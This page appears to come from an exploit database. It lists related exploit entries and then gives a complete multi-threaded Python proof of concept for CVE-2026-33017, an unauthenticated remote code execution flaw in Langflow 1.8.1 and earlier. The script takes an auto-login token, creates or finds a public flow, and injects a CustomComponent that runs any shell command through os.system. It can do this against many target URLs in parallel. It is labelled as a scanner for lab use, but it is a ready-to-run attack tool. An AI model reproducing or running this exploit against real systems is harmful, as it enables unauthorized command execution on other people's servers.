| Reporter | Title | Published | Views | Family All 39 |
|---|---|---|---|---|
| Exploit for Command Injection in Paloaltonetworks Pan-Os | 30 Mar 202613:39 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 22 May 202622:01 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 13 Apr 202618:33 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 20 Apr 202614:54 | – | githubexploit | |
| Exploit for CVE-2026-33017 | 21 Mar 202617:06 | – | githubexploit | |
| Exploit for Eval Injection in Langflow | 27 Mar 202607:15 | – | githubexploit | |
| Exploit for Eval Injection in Langflow | 7 Apr 202623:54 | – | githubexploit | |
| Exploit for Cross-site Scripting in B3Log Siyuan | 12 May 202619:20 | – | githubexploit | |
| Exploit for CVE-2026-33017 | 21 Mar 202608:11 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 14 Apr 202617:09 | – | githubexploit |
==================================================================================================================================
| # Title : Langflow 1.8.1 Unauthenticated RCE poc Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.langflow.org/ |
==================================================================================================================================
[+] Summary : This Python script is a multi-threaded tool targeting a suspected vulnerability in Langflow (≤ 1.8.1) that allows unauthenticated remote code execution through unsafe execution of CustomComponent code during flow compilation.
[+] The tool automates the exploitation workflow by:
Attempting to obtain an authentication token via an auto-login endpoint when available.
Searching for or creating a public flow within the target instance.
Injecting a malicious CustomComponent payload containing Python code that triggers OS command execution.
Submitting a build request to the vulnerable endpoint and monitoring job execution events.
Reporting whether the target is vulnerable based on build validation results.
Supporting multi-target scanning with threading, optional cleanup of created flows, and configurable command execution.
Overall, it is designed as an automated scanner to detect and demonstrate potential RCE impact in vulnerable Langflow deployments.
[+] POC :
#!/usr/bin/env python3
import argparse
import json
import sys
import threading
import uuid
from concurrent.futures import ThreadPoolExecutor, as_completed
import requests
_print_lock = threading.Lock()
def log(target: str, msg: str) -> None:
with _print_lock:
print(f"[{target}] {msg}")
def get_auth_token(base_url: str, timeout: int) -> str | None:
try:
resp = requests.get(f"{base_url}/api/v1/auto_login", timeout=timeout)
if resp.status_code == 200:
return resp.json().get("access_token")
except (requests.RequestException, ValueError):
pass
return None
def find_public_flow(base_url: str, token: str, timeout: int) -> tuple[str | None, str | None]:
try:
resp = requests.get(
f"{base_url}/api/v1/flows/",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
)
resp.raise_for_status()
flows = resp.json()
if not isinstance(flows, list):
return None, None
for flow in flows:
if flow.get("access_type") == "PUBLIC":
return flow["id"], flow.get("name", "?")
except (requests.RequestException, ValueError, KeyError):
pass
return None, None
def create_public_flow(base_url: str, token: str, timeout: int) -> str:
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json",
}
body = {
"name": f"lab-{uuid.uuid4().hex[:8]}",
"data": {"nodes": [], "edges": [], "viewport": {}},
"is_component": False,
"access_type": "PUBLIC",
"description": "CVE-2026-33017 lab flow",
}
resp = requests.post(f"{base_url}/api/v1/flows/", json=body, headers=headers, timeout=timeout)
resp.raise_for_status()
flow = resp.json()
if not isinstance(flow, dict):
raise ValueError(f"invalid response: {flow}")
flow_id = flow.get("id")
if not flow_id:
raise ValueError(f"create_flow: no id in response: {flow}")
if flow.get("access_type") != "PUBLIC":
requests.patch(
f"{base_url}/api/v1/flows/{flow_id}",
json={"access_type": "PUBLIC"},
headers=headers,
timeout=timeout,
).raise_for_status()
return flow_id
def delete_flow(base_url: str, token: str, flow_id: str, timeout: int) -> None:
try:
requests.delete(
f"{base_url}/api/v1/flows/{flow_id}",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
)
except requests.RequestException:
pass
def build_exploit_payload(command: str) -> dict:
malicious_code = f"""\
from langflow.custom import Component
from langflow.io import Output
_r = __import__('os').system({repr(command)})
class ExploitComponent(Component):
display_name = "ExploitComponent"
description = "CVE-2026-33017 PoC"
outputs = [Output(display_name="Result", name="output", method="run")]
def run(self) -> str:
return "ok"
"""
node_id = str(uuid.uuid4())
return {
"data": {
"nodes": [
{
"id": node_id,
"type": "genericNode",
"position": {"x": 0, "y": 0},
"data": {
"type": "CustomComponent",
"id": node_id,
"node": {
"template": {
"_type": "CustomComponent",
"code": {
"value": malicious_code,
"type": "code",
"required": True,
"show": True,
"name": "code",
"dynamic": False,
"list": False,
"multiline": True,
},
},
"description": "poc",
"display_name": "ExploitComponent",
"custom_fields": {},
"output_types": ["str"],
"base_classes": ["str"],
"outputs": [
{
"display_name": "Result",
"name": "output",
"method": "run",
"selected": "str",
"types": ["str"],
"value": "__UNDEFINED__",
}
],
},
},
}
],
"edges": [],
"viewport": {"x": 0, "y": 0, "zoom": 1},
}
}
def _poll_job_result(base_url: str, job_id: str, client_id: str, token: str | None, timeout: int) -> bool:
headers = {"Accept": "application/x-ndjson"}
if token:
headers["Authorization"] = f"Bearer {token}"
try:
with requests.get(
f"{base_url}/api/v1/build/{job_id}/events",
headers=headers,
cookies={"client_id": client_id},
stream=True,
timeout=timeout,
) as r:
for raw_line in r.iter_lines():
if not raw_line:
continue
if isinstance(raw_line, bytes):
raw_line = raw_line.decode("utf-8", errors="replace")
try:
evt = json.loads(raw_line)
if evt.get("event") == "end_vertex":
return bool(evt.get("data", {}).get("build_data", {}).get("valid"))
except json.JSONDecodeError:
pass
except requests.RequestException:
pass
return False
def send_exploit(base_url: str, flow_id: str, command: str, token: str | None, timeout: int) -> bool:
payload = build_exploit_payload(command)
client_id = str(uuid.uuid4())
endpoint = f"{base_url}/api/v1/build_public_tmp/{flow_id}/flow"
resp = requests.post(endpoint, json=payload, cookies={"client_id": client_id}, timeout=timeout)
if resp.status_code == 403 and token:
resp = requests.post(
endpoint,
json=payload,
cookies={"client_id": client_id},
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
)
if resp.status_code not in (200, 201):
return False
try:
data = resp.json()
except ValueError:
return False
job_id = data.get("job_id")
if not job_id:
return False
return _poll_job_result(base_url, job_id, client_id, token, timeout)
def exploit_target(
base_url: str,
cmd: str,
flow_id_arg: str | None,
timeout: int,
no_cleanup: bool,
) -> dict:
def err(detail: str) -> dict:
return {"url": base_url, "status": "ERROR", "detail": detail}
token = get_auth_token(base_url, timeout)
log(base_url, f"auth: {'JWT token obtained' if token else 'no token (scenario B)'}")
flow_id = flow_id_arg
flow_created = False
if flow_id:
log(base_url, f"flow: provided via argument ({flow_id})")
elif token:
flow_id, flow_name = find_public_flow(base_url, token, timeout)
if flow_id:
log(base_url, f"flow: existing public flow — {flow_name} ({flow_id})")
else:
try:
flow_id = create_public_flow(base_url, token, timeout)
flow_created = True
log(base_url, f"flow: created ({flow_id})")
except (requests.RequestException, ValueError) as e:
log(base_url, f"flow: creation failed — {e}")
return err(f"create_flow: {e}")
else:
log(base_url, "no token and no --flow-id provided")
return err("no token and no --flow-id provided")
try:
success = send_exploit(base_url, flow_id, cmd, token, timeout)
except requests.RequestException as e:
log(base_url, f"exploit: network error — {e}")
return err(f"send_exploit: {e}")
finally:
if flow_created and not no_cleanup and token:
delete_flow(base_url, token, flow_id, timeout)
log(base_url, f"flow: deleted ({flow_id})")
if success:
log(base_url, "[+] VULNERABLE — RCE executed")
return {"url": base_url, "status": "VULNERABLE", "detail": ""}
else:
log(base_url, "[-] FAILED — build invalide ou non confirmé")
return {"url": base_url, "status": "FAILED", "detail": "invalid build"}
def main() -> None:
parser = argparse.ArgumentParser(
description="CVE-2026-33017 — Langflow RCE PoC (educational / lab use only)",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=__doc__,
)
parser.add_argument("--url", default=None, help="Single target Langflow URL")
parser.add_argument("--url-file", default=None, help="Text file with one URL per line")
parser.add_argument("--cmd", default="id", help="OS command to execute (default: id)")
parser.add_argument("--flow-id", default=None, help="UUID of an existing public flow (optional)")
parser.add_argument("--threads", type=int, default=5, help="Parallel threads (default: 5)")
parser.add_argument("--timeout", type=int, default=15, help="HTTP timeout in seconds (default: 15)")
parser.add_argument("--no-cleanup", action="store_true", help="Do not delete the created flow after exploitation")
args = parser.parse_args()
targets: list[str] = []
if args.url:
targets.append(args.url.rstrip("/"))
if args.url_file:
try:
with open(args.url_file) as f:
for line in f:
line = line.strip()
if line and not line.startswith("#"):
targets.append(line.rstrip("/"))
except OSError as e:
print(f"[-] Cannot read {args.url_file}: {e}")
sys.exit(1)
if not targets:
parser.error("Provide --url or --url-file")
targets = list(dict.fromkeys(targets))
print(f"\n{'='*60}")
print(f" CVE-2026-33017 — Langflow RCE PoC")
print(f"{'='*60}")
print(f" Targets : {len(targets)}")
print(f" Command : {args.cmd}")
print(f" Threads : {args.threads} | Timeout : {args.timeout}s")
print(f"{'='*60}\n")
results: list[dict] = []
with ThreadPoolExecutor(max_workers=args.threads) as pool:
futures = {
pool.submit(
exploit_target,
url, args.cmd,
args.flow_id, args.timeout, args.no_cleanup,
): url
for url in targets
}
for future in as_completed(futures):
try:
results.append(future.result())
except Exception as e:
results.append({"url": futures[future], "status": "ERROR", "detail": str(e)})
flags = {"VULNERABLE": "[+]", "FAILED": "[-]", "ERROR": "[!]"}
col = max(len(r["url"]) for r in results)
print(f"\n{'='*60}")
print(f" SUMMARY")
print(f"{'='*60}")
for r in sorted(results, key=lambda x: x["status"]):
flag = flags.get(r["status"], "[ ]")
detail = f" {r['detail']}" if r["detail"] else ""
print(f" {flag} {r['url']:<{col}} {r['status']}{detail}")
print(f"{'='*60}")
vuln_count = sum(1 for r in results if r["status"] == "VULNERABLE")
print(f"\n {vuln_count}/{len(results)} target(s) vulnerable\n")
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation